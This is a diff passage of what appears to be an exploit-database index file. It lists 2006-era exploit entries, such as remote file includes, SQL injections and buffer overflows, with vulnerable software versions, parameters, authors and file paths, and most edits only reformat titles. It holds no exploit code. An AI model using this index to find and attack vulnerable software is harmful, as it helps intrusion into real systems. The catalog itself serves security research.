0.0.1a (include_path) Remote File Include",2006-09-11,ddoshomo,php,webapps,0 -2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 (include/XSS) Remote Vulnerabilities",2006-09-11,s3rv3r_hack3r,php,webapps,0 -2348,platforms/php/webapps/2348.pl,"phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 -2349,platforms/php/webapps/2349.txt,"phpBB XS <= 0.58 (functions.php) Remote File Include",2006-09-12,AzzCoder,php,webapps,0 -2350,platforms/php/webapps/2350.txt,"p4CMS <= 1.05 (abs_pfad) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 +2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - (include/XSS) Remote Vulnerabilities",2006-09-11,s3rv3r_hack3r,php,webapps,0 +2348,platforms/php/webapps/2348.pl,"phpBB <= 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 +2349,platforms/php/webapps/2349.txt,"phpBB XS <= 0.58 - (functions.php) Remote File Include",2006-09-12,AzzCoder,php,webapps,0 +2350,platforms/php/webapps/2350.txt,"p4CMS <= 1.05 - (abs_pfad) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper <= 1.41-r2 - (form) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 - Remote File Include",2006-09-12,CeNGiZ-HaN,php,webapps,0 -2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 +2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 - (dir_path) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 -2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include",2006-09-13,mdx,php,webapps,0 +2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 - (set) Remote File Include",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include",2006-09-13,Rivertam,php,webapps,0 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 -2359,platforms/php/webapps/2359.txt,"Downstat <= 1.8 (art) Remote File Include",2006-09-13,SilenZ,php,webapps,0 +2359,platforms/php/webapps/2359.txt,"Downstat <= 1.8 - (art) Remote File Include",2006-09-13,SilenZ,php,webapps,0 2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc) (2)",2006-09-13,"Marco Ivaldi",solaris,local,0 -2361,platforms/php/webapps/2361.txt,"Shadowed Portal <= 5.599 (root) Remote File Include",2006-09-13,mad_hacker,php,webapps,0 -2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 (icerikno) Remote SQL Injection",2006-09-13,RMx,asp,webapps,0 -2363,platforms/php/webapps/2363.tt,"Magic News Pro <= 1.0.3 (script_path) Remote File Include",2006-09-13,"Saudi Hackrz",php,webapps,0 -2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder <= 2.2 (visEdit_root) Remote File Include",2006-09-13,igi,php,webapps,0 +2361,platforms/php/webapps/2361.txt,"Shadowed Portal <= 5.599 - (root) Remote File Include",2006-09-13,mad_hacker,php,webapps,0 +2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) Remote SQL Injection",2006-09-13,RMx,asp,webapps,0 +2363,platforms/php/webapps/2363.tt,"Magic News Pro <= 1.0.3 - (script_path) Remote File Include",2006-09-13,"Saudi Hackrz",php,webapps,0 +2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder <= 2.2 - (visEdit_root) Remote File Include",2006-09-13,igi,php,webapps,0 2365,platforms/php/webapps/2365.txt,"Newsscript <= 0.5 - Remote and Local File Include",2006-09-13,"Daftrix Security",php,webapps,0 -2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 (pagename) Remote File Include",2006-09-14,Solpot,php,webapps,0 +2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Include",2006-09-14,Solpot,php,webapps,0 2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component <= 0.4.4 File Include",2006-09-14,"Mehmet Ince",php,webapps,0 -2368,platforms/php/webapps/2368.txt,"TeamCal Pro <= 2.8.001 (app_root) Remote file Include",2006-09-14,PSYCH@,php,webapps,0 -2369,platforms/php/webapps/2369.txt,"PhotoPost <= 4.6 (PP_PATH) Remote File Include",2006-09-15,"Saudi Hackrz",php,webapps,0 +2368,platforms/php/webapps/2368.txt,"TeamCal Pro <= 2.8.001 - (app_root) Remote file Include",2006-09-14,PSYCH@,php,webapps,0 +2369,platforms/php/webapps/2369.txt,"PhotoPost <= 4.6 - (PP_PATH) Remote File Include",2006-09-15,"Saudi Hackrz",php,webapps,0 2370,platforms/php/webapps/2370.php,"Limbo CMS <= 1.0.4.2L (com_contact) Remote Code Execution Exploit",2006-09-15,rgod,php,webapps,0 2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) Remote SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 -2372,platforms/php/webapps/2372.txt,"BolinOS <= 4.5.5 (gBRootPath) Remote File Include",2006-09-15,"Mehmet Ince",php,webapps,0 -2373,platforms/php/webapps/2373.txt,"PHP DocWriter <= 0.3 (script) Remote File Include Exploit",2006-09-15,Kacper,php,webapps,0 +2372,platforms/php/webapps/2372.txt,"BolinOS <= 4.5.5 - (gBRootPath) Remote File Include",2006-09-15,"Mehmet Ince",php,webapps,0 +2373,platforms/php/webapps/2373.txt,"PHP DocWriter <= 0.3 - (script) Remote File Include Exploit",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School <= 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery <= 1.2.2b (Nuke Addon) Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 2376,platforms/php/webapps/2376.pl,"phpQuiz <= 0.1.2 - Remote SQL Injection / Code Execution Exploit",2006-09-16,simo64,php,webapps,0 2377,platforms/php/webapps/2377.txt,"aeDating <= 4.1 - dir[inc] Remote File Include Vulnerabilities",2006-09-16,NeXtMaN,php,webapps,0 2378,platforms/php/webapps/2378.php,"GNUTURK <= 2G (t_id) Remote SQL Injection Exploit",2006-09-16,p2y,php,webapps,0 2379,platforms/php/webapps/2379.txt,"Mambo com_registration_detailed <= 4.1 - Remote File Include",2006-09-16,k1tk4t,php,webapps,0 -2380,platforms/php/webapps/2380.txt,"UNAK-CMS <= 1.5 (dirroot) Remote File Include Vulnerabilities",2006-09-16,SHiKaA,php,webapps,0 +2380,platforms/php/webapps/2380.txt,"UNAK-CMS <= 1.5 - (dirroot) Remote File Include Vulnerabilities",2006-09-16,SHiKaA,php,webapps,0 2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution <= 0.9.1 - Remote File Include",2006-09-16,SHiKaA,php,webapps,0 -2382,platforms/php/webapps/2382.pl,"Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit",2006-09-17,SlimTim10,php,webapps,0 +2382,platforms/php/webapps/2382.pl,"Zix Forum <= 1.12 - (RepId) Remote SQL Injection Exploit",2006-09-17,SlimTim10,php,webapps,0 2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP <= 1.5 RC2 - Remote File Include",2006-09-17,Timq,php,webapps,0 -2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 (browse.asp) Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 +2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 - (browse.asp) Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 2388,platforms/php/webapps/2388.txt,"CMtextS <= 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends <= 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Include",2006-09-18,AzzCoder,php,webapps,0 -2391,platforms/php/webapps/2391.php,"Exponent CMS <= 0.96.3 (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 +2391,platforms/php/webapps/2391.php,"Exponent CMS <= 0.96.3 - (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro (Home_Path) Remote File Include",2006-09-19,"Saudi Hackrz",php,webapps,0 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro (Inc_Dir) Remote File Include Vulnerabilities",2006-09-19,SnIpEr_SA,php,webapps,0 -2394,platforms/php/webapps/2394.php,"more.groupware <= 0.74 (new_calendarid) Remote SQL Injection Exploit",2006-09-19,x128,php,webapps,0 -2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 (tr) Remote SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 +2394,platforms/php/webapps/2394.php,"more.groupware <= 0.74 - (new_calendarid) Remote SQL Injection Exploit",2006-09-19,x128,php,webapps,0 +2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - (tr) Remote SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Include",2006-09-19,CeNGiZ-HaN,php,webapps,0 -2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 (email) Remote SQL Injection / Code Execution Exploit",2006-09-19,STILPU,php,webapps,0 +2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) Remote SQL Injection / Code Execution Exploit",2006-09-19,STILPU,php,webapps,0 2398,platforms/php/webapps/2398.txt,"Digital WebShop <= 1.128 - Multiple Remote File Include Vulnerabilities",2006-09-19,ajann,php,webapps,0 -2399,platforms/php/webapps/2399.txt,"BCWB <= 0.99 (root_path) Remote File Include",2006-09-19,ajann,php,webapps,0 +2399,platforms/php/webapps/2399.txt,"BCWB <= 0.99 - (root_path) Remote File Include",2006-09-19,ajann,php,webapps,0 2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer (VML) Remote Denial of Service Exploit PoC",2006-09-19,Shirkdog,windows,dos,0 -2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 (PASV response) Remote Buffer Overflow Exploit",2006-09-20,h07,windows,remote,0 +2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 - (PASV response) Remote Buffer Overflow Exploit",2006-09-20,h07,windows,remote,0 2402,platforms/php/webapps/2402.php,"Php Blue Dragon CMS <= 2.9.1 - (XSS/SQL) Code Execution Exploit",2006-09-20,Kacper,php,webapps,0 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit",2006-09-20,nop,windows,remote,0 -2404,platforms/linux/local/2404.c,"Dr.Web Antivirus 4.33 (LHA long directory name) Local Overflow Exploit",2006-09-20,Guay-Leroux,linux,local,0 -2405,platforms/php/webapps/2405.txt,"AllMyGuests <= 0.4.1 (cfg_serverpath) Remote File Include",2006-09-20,Br@Him,php,webapps,0 +2404,platforms/linux/local/2404.c,"Dr.Web Antivirus 4.33 - (LHA long directory name) Local Overflow Exploit",2006-09-20,Guay-Leroux,linux,local,0 +2405,platforms/php/webapps/2405.txt,"AllMyGuests <= 0.4.1 - (cfg_serverpath) Remote File Include",2006-09-20,Br@Him,php,webapps,0 2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) Remote SQL Injection Exploit",2006-09-21,rgod,php,webapps,0 -2407,platforms/php/webapps/2407.txt,"pNews <= 1.1.0 (nbs) Remote File Include",2006-09-21,CvIr.System,php,webapps,0 +2407,platforms/php/webapps/2407.txt,"pNews <= 1.1.0 - (nbs) Remote File Include",2006-09-21,CvIr.System,php,webapps,0 2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)",2006-09-21,"Trirat Puttaraksa",windows,remote,0 -2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include",2006-09-21,DaDIsS,php,webapps,0 -2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include",2006-09-21,Solpot,php,webapps,0 -2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0 +2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Include",2006-09-21,DaDIsS,php,webapps,0 +2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Include",2006-09-21,Solpot,php,webapps,0 +2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 - (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0 2412,platforms/windows/local/2412.c,"Microsoft Windows - Kernel Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0 -2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/XSS/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0 +2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 - (include/XSS/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0 -2416,platforms/asp/webapps/2416.txt,"xweblog <= 2.1 (kategori.asp) Remote SQL Injection",2006-09-22,Muhacir,asp,webapps,0 -2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 (index.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 -2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 (all_users.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 -2419,platforms/php/webapps/2419.txt,"Web-News <= 1.6.3 (template.php) Remote File Include",2006-09-24,Drago84,php,webapps,0 -2420,platforms/php/webapps/2420.txt,"ZoomStats <= 1.0.2 (mysql.php) Remote File Include",2006-09-24,Drago84,php,webapps,0 -2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script <= 1.5 (tr) Remote SQL Injection Exploit",2006-09-24,gega,asp,webapps,0 -2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script <= 3.4 (mcf.php) Remote File Include",2006-09-24,xdh,php,webapps,0 -2423,platforms/asp/webapps/2423.txt,"iyzi Forum <= 1.0 Beta 3 (uye_ayrinti.asp) Remote SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 -2424,platforms/php/webapps/2424.txt,"SyntaxCMS <= 1.3 (0004_init_urls.php) Remote File Include",2006-09-24,MoHaJaLi,php,webapps,0 +2416,platforms/asp/webapps/2416.txt,"xweblog <= 2.1 - (kategori.asp) Remote SQL Injection",2006-09-22,Muhacir,asp,webapps,0 +2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - (index.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 +2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - (all_users.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 +2419,platforms/php/webapps/2419.txt,"Web-News <= 1.6.3 - (template.php) Remote File Include",2006-09-24,Drago84,php,webapps,0 +2420,platforms/php/webapps/2420.txt,"ZoomStats <= 1.0.2 - (mysql.php) Remote File Include",2006-09-24,Drago84,php,webapps,0 +2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script <= 1.5 - (tr) Remote SQL Injection Exploit",2006-09-24,gega,asp,webapps,0 +2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script <= 3.4 - (mcf.php) Remote File Include",2006-09-24,xdh,php,webapps,0 +2423,platforms/asp/webapps/2423.txt,"iyzi Forum <= 1.0 Beta 3 - (uye_ayrinti.asp) Remote SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 +2424,platforms/php/webapps/2424.txt,"SyntaxCMS <= 1.3 - (0004_init_urls.php) Remote File Include",2006-09-24,MoHaJaLi,php,webapps,0 2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2)",2006-09-24,jamikazu,windows,remote,0 2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) - Remote Buffer Overflow Exploit (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 -2427,platforms/php/webapps/2427.txt,"Polaring <= 0.04.03 (general.php) Remote File Include",2006-09-25,Drago84,php,webapps,0 +2427,platforms/php/webapps/2427.txt,"Polaring <= 0.04.03 - (general.php) Remote File Include",2006-09-25,Drago84,php,webapps,0 2428,platforms/php/webapps/2428.txt,"PBLang <= 4.66z (temppath) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 2429,platforms/php/webapps/2429.txt,"Minerva <= 2.0.21 build 238a - (phpbb_root_path) File Include",2006-09-25,SHiKaA,php,webapps,0 -2431,platforms/php/webapps/2431.txt,"evoBB <= 0.3 (path) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 -2432,platforms/php/webapps/2432.txt,"BrudaNews <= 1.1 (admin/index.php) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 -2433,platforms/php/webapps/2433.txt,"BrudaGB <= 1.1 (admin/index.php) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 +2431,platforms/php/webapps/2431.txt,"evoBB <= 0.3 - (path) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 +2432,platforms/php/webapps/2432.txt,"BrudaNews <= 1.1 - (admin/index.php) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 +2433,platforms/php/webapps/2433.txt,"BrudaGB <= 1.1 - (admin/index.php) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal <= 2.0.42 - (fs_form_links.php) File Include",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"WEB//NEWS <= 1.4 - (parser.php) Remote File Include",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Include",2006-09-26,Drago84,php,webapps,0 -2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 -2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 (hit.php) Remote File Include",2006-09-26,D_7J,php,webapps,0 +2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 - (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 +2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Include",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-27,v1per-haCker,php,webapps,0 -2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 (main.inc.php) Remote File Include Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 -2444,platforms/multiple/dos/2444.sh,"OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit",2006-09-27,"Tavis Ormandy",multiple,dos,0 -2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit",2006-09-27,h07,windows,remote,80 -2446,platforms/php/webapps/2446.php,"PPA Gallery <= 1.0 (functions.inc.php) Remote File Include Exploit",2006-09-28,Kacper,php,webapps,0 -2447,platforms/php/webapps/2447.php,"KGB 1.87 (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 -2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0 +2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Include Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 +2444,platforms/multiple/dos/2444.sh,"OpenSSH <= 4.3 p1 - (Duplicated Block) Remote Denial of Service Exploit",2006-09-27,"Tavis Ormandy",multiple,dos,0 +2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit",2006-09-27,h07,windows,remote,80 +2446,platforms/php/webapps/2446.php,"PPA Gallery <= 1.0 - (functions.inc.php) Remote File Include Exploit",2006-09-28,Kacper,php,webapps,0 +2447,platforms/php/webapps/2447.php,"KGB 1.87 - (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 +2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include",2006-09-28,D_7J,php,webapps,0 -2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include",2006-09-28,Kernel-32,php,webapps,0 +2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 - (index.php) Remote File Include",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Include",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"phpSecurePages <= 0.28b (secure.php) Remote File Include",2006-09-28,D_7J,php,webapps,0 2453,platforms/php/webapps/2453.txt,"phpBB XS <= 0.58a (phpbb_root_path) Remote File Include",2006-09-28,"Mehmet Ince",php,webapps,0 2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a (index.php) Remote File Include",2006-09-29,v1per-haCker,php,webapps,0 -2455,platforms/php/webapps/2455.php,"VideoDB <= 2.2.1 (pdf.php) Remote File Include Exploit",2006-09-29,Kacper,php,webapps,0 +2455,platforms/php/webapps/2455.php,"VideoDB <= 2.2.1 - (pdf.php) Remote File Include Exploit",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a (display.php) SQL Injection Exploit",2006-09-29,Trex,php,webapps,0 -2457,platforms/php/webapps/2457.php,"UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 +2457,platforms/php/webapps/2457.php,"UBB.threads <= 6.5.1.1 - (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (Perl)",2006-09-29,"YAG KOHHA",windows,remote,0 2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit",2006-09-29,LukeHack,windows,remote,0 -2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include",2006-09-30,Drago84,php,webapps,0 +2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 - (yesno.phtml) Remote Include",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 - (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x) (0Day)",2006-09-30,"Kevin Finisterre",osx,local,0 -2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 +2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit",2006-10-01,muts,windows,remote,81 -2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 (includes/functions.php) Remote File Include",2006-10-02,SpiderZ,php,webapps,0 -2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 +2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 - (includes/functions.php) Remote File Include",2006-10-02,SpiderZ,php,webapps,0 +2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 - (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include",2006-10-03,mozi,php,webapps,0 -2471,platforms/php/webapps/2471.pl,"Travelsized CMS <= 0.4 (frontpage.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 +2471,platforms/php/webapps/2471.pl,"Travelsized CMS <= 0.4 - (frontpage.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS <= 5.0.1 - (show_hlp.php) File Include Exploit",2006-10-03,Kacper,php,webapps,0 2473,platforms/php/webapps/2473.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit",2006-10-03,1nf3ct0r,php,webapps,0 2474,platforms/php/webapps/2474.txt,"JAF CMS <= 4.0 RC1 - Multiple Remote File Include Vulnerabilities",2006-10-04,"ThE TiGeR",php,webapps,0 2475,platforms/php/webapps/2475.txt,"phpBB Admin Topic Action Logging Mod <= 0.94b - File Include",2006-10-04,SpiderZ,php,webapps,0 -2476,platforms/php/webapps/2476.txt,"phpGreetz <= 0.99 (footer.php) Remote File Include",2006-10-04,mozi,php,webapps,0 +2476,platforms/php/webapps/2476.txt,"phpGreetz <= 0.99 - (footer.php) Remote File Include",2006-10-04,mozi,php,webapps,0 2477,platforms/php/webapps/2477.txt,"phpBB Static Topics <= 1.0 - phpbb_root_path File Include",2006-10-04,Kw3[R]Ln,php,webapps,0 -2478,platforms/php/webapps/2478.txt,"phpMyTeam <= 2.0 (smileys_dir) Remote File Include",2006-10-05,"Mehmet Ince",php,webapps,0 -2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 (index.php) Remote SQL Injection",2006-10-05,Kzar,php,webapps,0 -2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include",2006-10-05,SpiderZ,php,webapps,0 -2481,platforms/php/webapps/2481.txt,"Dimension of phpBB <= 0.2.6 (phpbb_root_path) Remote File Includes",2006-10-05,SpiderZ,php,webapps,0 +2478,platforms/php/webapps/2478.txt,"phpMyTeam <= 2.0 - (smileys_dir) Remote File Include",2006-10-05,"Mehmet Ince",php,webapps,0 +2479,platforms/php/webapps/2479.txt,"PHP Classifieds 7.1 - (index.php) Remote SQL Injection",2006-10-05,Kzar,php,webapps,0 +2480,platforms/php/webapps/2480.txt,"phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Include",2006-10-05,SpiderZ,php,webapps,0 +2481,platforms/php/webapps/2481.txt,"Dimension of phpBB <= 0.2.6 - (phpbb_root_path) Remote File Includes",2006-10-05,SpiderZ,php,webapps,0 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - (POST) Remote Buffer Overflow Exploit",2006-10-05,SkOd,windows,remote,0 2483,platforms/php/webapps/2483.txt,"phpBB User Viewed Posts Tracker <= 1.0 File Include",2006-10-06,"Mehmet Ince",php,webapps,0 -2484,platforms/php/webapps/2484.txt,"FreeForum <= 0.9.7 (forum.php) 